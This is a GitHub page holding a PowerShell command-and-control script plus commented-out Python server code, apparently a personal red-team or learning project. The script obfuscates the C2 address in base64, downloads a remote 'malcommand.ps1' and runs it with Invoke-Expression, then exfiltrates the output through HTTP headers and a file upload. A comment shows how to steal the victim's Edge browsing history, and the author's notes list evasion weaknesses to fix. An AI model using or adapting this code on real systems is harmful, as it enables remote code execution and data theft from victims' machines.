-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathCommand&Control_001.ps1
More file actions
99 lines (74 loc) · 3.68 KB
/
Command&Control_001.ps1
File metadata and controls
99 lines (74 loc) · 3.68 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
# Send and receive commands to a C2
# Bajiri
# For testing purposes only
# Obfuscate the address of the C2 server
$Base64Address = ""
$HelloHeader = @{
"Name" = $env:COMPUTERNAME
}
# Send a post request to the webserver containing the hello
$Comm = Invoke-WebRequest -URI $([System.Convert]::FromBase64String($Base64Address) |%{[char]$_}|Join-String) -Header $HelloHeader -Method Head -SkipHttpErrorCheck
if($Comm){
$Payload = Invoke-WebRequest -URI $(([System.Convert]::FromBase64String($Base64Address) |%{[char]$_}|Join-String)+"/malcommand.ps1") -Method GET -SkipHttpErrorCheck
if($Payload){
$CommandExecution = Invoke-Expression -Command $($Payload.content | %{[char]$_} | Join-String) | Out-String
$Output = @{
"Output" = $([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($CommandExecution)))
}
# Send the output of the command as a header
Invoke-WebRequest -URI $([System.Convert]::FromBase64String($Base64Address) |%{[char]$_}|Join-String) -Header $Output -Method HEAD | Out-Null
# Send the output as a file upload
[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($CommandExecution)) > Base64EncOutput
$formtosend = @{
"file" = Get-Item -Path Base64EncOutput
# You can also upload things like Edge history SQLite DB
# "history" = Get-Item -Path $("C:\Users\"+$env:USERNAME+"\AppData\Local\Microsoft\Edge\User Data\Default\History")
}
Invoke-WebRequest -URI $([System.Convert]::FromBase64String($Base64Address) |%{[char]$_}|Join-String) -Method Put -Form $formtosend -Headers $HelloHeader
}
}
<#
Weaknesses:
This does not phone home or run indefinitely. It's a one and done sort of thing. No beaconing either.
Traffic is unencrypted and will be seen immediately. No UAC bypass/elevation included, so commands run in user's scope.
Creating a file to upload will leave artifacts on the victim machine.
#>
<#
Python http.server code
# import dependencies
import http.server
import socketserver
import os
# Set port
PORT = 80
# Create handlers for each method
class GetHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
http.server.SimpleHTTPRequestHandler.do_GET(self)
def do_HEAD(self):
print(self.headers)
http.server.SimpleHTTPRequestHandler.do_HEAD(self)
def do_PUT(self):
# Use the name passed in the header as the file name
filename = self.headers['Name']
# Write the file to the path the server is running from
file_length = int(self.headers['Content-Length'])
with open(filename, 'wb') as output_file:
output_file.write(self.rfile.read(file_length))
# Listen forever
with socketserver.TCPServer(("", PORT), GetHandler) as httpd:
httpd.serve_forever()
'''
Files not included:
malcommand.ps1
Value: "Get-Process"
Weaknesses:
This will overwrite the output file each time. Some simple changes will allow for multiple file creation.
All files can be pulled from the server. Building in a check for a specific header and/or restricting access to files is probably a good idea.
Data does not get decoded in this script. All output is as received.
Acknowledgements:
Thanks to Jason Rebelo Neves for the do_PUT code I copy/pasted: https://stackoverflow.com/questions/66514500/how-do-i-configure-a-python-server-for-post
Also putting this in here because I'll definitely forget everything about this in 2 weeks: https://docs.python.org/3/library/http.server.html
Shout out to my Ubuntu VM for giving me Low Disk Space on "Filesystem root" notifications every time I uploaded a test file. One day I'll give you more than 16gb.
'''
#>